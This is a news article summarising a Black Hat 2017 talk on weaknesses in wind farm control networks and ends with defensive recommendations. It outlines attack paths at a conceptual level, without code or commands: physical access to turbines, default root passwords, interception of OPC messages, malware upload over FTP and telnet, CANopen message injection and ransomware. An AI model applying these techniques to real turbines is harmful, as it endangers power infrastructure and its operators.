Black Hat: Hacking a Wind Farm

Wednesday, August 2, 2017 @ 02:08 PM gHale


By Gregory Hale
There is no doubt wind power is one of the up and coming sources of power that can help fuel a nation in need of more energy, but security is a major issue moving forward.

As more wind farms start to dot the landscape, the thought of how to secure the physical and cyber side of a cluster of turbines, or one single turbine, becomes a very important factor.

RELATED STORIES
Black Hat: AI as an Attack Method
Black Hat: Flaws in Radiation Monitors
Black Hat: Human Side of Grid Attack
Black Hat: Security Needs to Change

“Wind farms are very susceptible to attack,” said Jason Staggs, an information security researcher at the University of Tulsa, during is talk entitled “Adventures in Attacking Wind Farm Control Networks” last Wednesday at Black Hat USA 2017 in Las Vegas, NV. “One turbine that is compromised can bring down other turbines.”

Staggs listed an overview of vulnerabilities facing wind farms:
• Programmable automation controllers (PACs) running legacy operating systems, everything is operating as a root, use of insecure remote management services, easy to figure out default passwords, and no code signing
• No authentication or encryption of control messages
• No network segmentation between wind turbines
• No physical security

With a simple picking of a lock at a turbine, a hacker could plug his or her Raspberry Pi into the turbine’s PAC and circumvent the weak network security.

IEC 61400-25 defines communications requirements for wind power plants. Most wind farms use OPCXML-DA message services.

That is where some of the issues come in as an attacker could easily break in through the message service.

The specifics on what commands a hacker could take advantage of at a single wind turbine could vary from vendor to vendor, but in most cases, it could change maximum power generation output; change the wind turbine operating state: On, off, or idle, or instigate an emergency shut down, which could be a hard stop that induces excessive wear and tear on critical mechanical components.

If an attacker got in to the network it would be possible to cause a man in the middle attack by intercepting a OPC request from the HMI to the turbines to create a malicious request to cause a damaging issue, Staggs said.

That can happen simply by breaking into a turbine located in some remote area and connect through a port on a system at the turbine and create a static ID and then go to town.

It would be possible to target the PAC and leverage root user accounts with default or weak passwords.

The malware propagation techniques would be possible through a malware upload using FTP and the execution via telnet.

Modifying Controls
After that, it would be possible to modify critical wind turbine process control variables with the CANopen object dictionary, layout of a controller object dictionary is defined in the vendor electronic data sheet, then inject CANopen shared data object messages and then manipulate power generation and motor variables, Staggs said.

Staggs went on to add it is possible to hold a wind farm hostage using ransomware.

At today’s rates, a wind farm can lose $10,000 to $30,000 for every hour it’s not in operation, he said.

Again, the attacker would gain access to a wind turbine, enter malware into the turbine system.

Malware gets the turbine in a paralyzing state; malware can then disable remote network management servers, and then malware starts ransomware campaign.

While, as Staggs pointed out, it is relatively easy to get into a wind farm system, users need to learn what they must do to recover from an attack.

Two ways are to reimage automation controller, which could take time, and replace the hardware, which could also take time and create a cost issue. All of that could mean the operator is losing out on the ability to produce electricity.

As Staggs mentioned, wind farm security is poor at best, so operators need to get more active and not wait for vendors to provide security. They also need to verify vendor claims on security. Operators also need to retrofit security.

In addition, they could move toward network segmentation where there are inline firewalls at each tower and also employ encrypted VPN tunnels for each tower.



Leave a Reply

You must be logged in to post a comment.